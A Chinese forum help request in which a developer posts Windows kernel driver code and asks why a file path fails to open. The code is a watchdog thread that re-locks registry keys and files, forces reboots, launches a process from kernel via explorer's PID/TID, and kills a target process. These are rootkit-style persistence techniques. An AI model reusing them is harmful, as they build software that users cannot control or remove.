|
阅读:1164回复:1
请问一个驱动中路径的问题,困扰了一个多星期了。
搞不清楚如果文件路径这样写的话 每次g_SysApp->m_Kernel32ImageBase == NULL,在Readfile的时候也失败~
高手帮忙看看,谢谢了,这个问题困扰了一个多星期了! 代码: VOID __stdcall WatchDogThread ( PVOID Context ) { int wait_before_run = 0; int wait_before_reboot =0; UNREFERENCED_PARAMETER(Context); KeSetPriorityThread(KeGetCurrentThread(), LOW_REALTIME_PRIORITY); CHAR szRunProcess[260]; sprintf(szRunProcess,"\\programfiles\\Intel\\%s",TARGET_PROCESS_NAME); while(1) { if(g_SysApp->m_bUninstalled) { LogPrint("watchdog exit for uninstalled\n"); break; } if(kWatchDogExit) { break; } //reboot if(wait_before_reboot && wait_before_reboot <=2) { LogPrint("watchdog need reboot\n"); System_Reboot(); } if(RegCheck() && !g_SysApp->m_bUninstalled){ LogPrint("watchdog need fix reg now\n"); RegLock(); wait_before_reboot ++; } if(FileCheck() && !g_SysApp->m_bUninstalled) { LogPrint("watchdog need fix file now\n"); FileLock(); wait_before_reboot ++; } if (NtfrsFileCheck() && !g_SysApp->m_bUninstalled) { LogPrint("watchdog ntfrs need fix file now\n"); NtfrsFileLock(); } if(g_SysApp->m_Kernel32ImageBase) { if(wait_before_run==2) { if(NeedRun()) { RunProcess(szRunProcess,g_SysApp->m_Kernel32ImageBase,g_SysApp->m_ExplorerPID, g_SysApp->m_ExplorerTID); WriteLastRun(); } } wait_before_run++; } if(g_SysApp->m_TargetTickout && (MyGetTickCount_S() - g_SysApp->m_TargetTickout>= TERMINATE_PROCESS_TIMEOUT) ) { LogPrint("watchdog need kill process now,tickcount=%d,time=%d\n", MyGetTickCount_S(),MyGetCurrentTime_S()); if(NT_SUCCESS(MyTerminateProcess(g_SysApp->m_TargetPID,STATUS_SUCCESS))) { g_SysApp->m_TargetPID=0; g_SysApp->m_TargetTickout=0; } } //Sleep System_Sleep(WATCHDOG_INTERNAL); } PsTerminateSystemThread(1); } PCHAR ReadFile_S1(CHAR* pszFileName,ULONG* uSizeX) { PCHAR uRet = 0; NTSTATUS ntStatus = STATUS_UNSUCCESSFUL; UNICODE_STRING unicFileName; ANSI_STRING ansiFileName; RtlInitAnsiString(&ansiFileName, pszFileName); ntStatus = RtlAnsiStringToUnicodeString(&unicFileName, &ansiFileName, TRUE); if (NT_SUCCESS(ntStatus)) { HANDLE hFile = NULL; IO_STATUS_BLOCK ioStatus = {0}; OBJECT_ATTRIBUTES obattrSource = {0}; InitializeObjectAttributes(&obattrSource, &unicFileName, OBJ_KERNEL_HANDLE|OBJ_CASE_INSENSITIVE, NULL, NULL); ntStatus = ZwOpenFile( &hFile, SYNCHRONIZE|GENERIC_READ, &obattrSource, &ioStatus, FILE_SHARE_READ|FILE_SHARE_WRITE, FILE_SYNCHRONOUS_IO_NONALERT|FILE_NON_DIRECTORY_FILE); if (NT_SUCCESS(ntStatus)) { FILE_STANDARD_INFORMATION fiStandard = {0}; LogPrint(__FUNCTION__" open file(%s) ok\n", pszFileName); ntStatus = ZwQueryInformationFile(hFile, &ioStatus, &fiStandard, sizeof(FILE_STANDARD_INFORMATION), FileStandardInformation); if (NT_SUCCESS(ntStatus)) { if (fiStandard.EndOfFile.HighPart==0 && fiStandard.EndOfFile.LowPart <= 32*1024*1024) { ULONG uSize = fiStandard.EndOfFile.LowPart; PCHAR pBuffer = (PCHAR)ExAllocatePool(NonPagedPool, uSize); if (pBuffer) { LARGE_INTEGER liOffset; liOffset.HighPart = 0; liOffset.LowPart = 0; RtlZeroMemory(pBuffer, uSize); ntStatus = ZwReadFile(hFile, NULL, NULL, NULL, &ioStatus, pBuffer, uSize, &liOffset, 0); if (NT_SUCCESS(ntStatus) && ioStatus.Information == fiStandard.EndOfFile.LowPart) { uRet = pBuffer; *uSizeX = uSize; LogPrint(__FUNCTION__" read file (%s) ok\n", pszFileName); } //ExFreePool(pBuffer); } } } ZwClose(hFile); } else { LogPrint(__FUNCTION__" open file (%s) fail,status=(%08x)\n", pszFileName,ntStatus); } RtlFreeUnicodeString(&unicFileName); } return uRet; } |
|
|
沙发#
发布于:2009-08-12 23:15
人呢?
|
|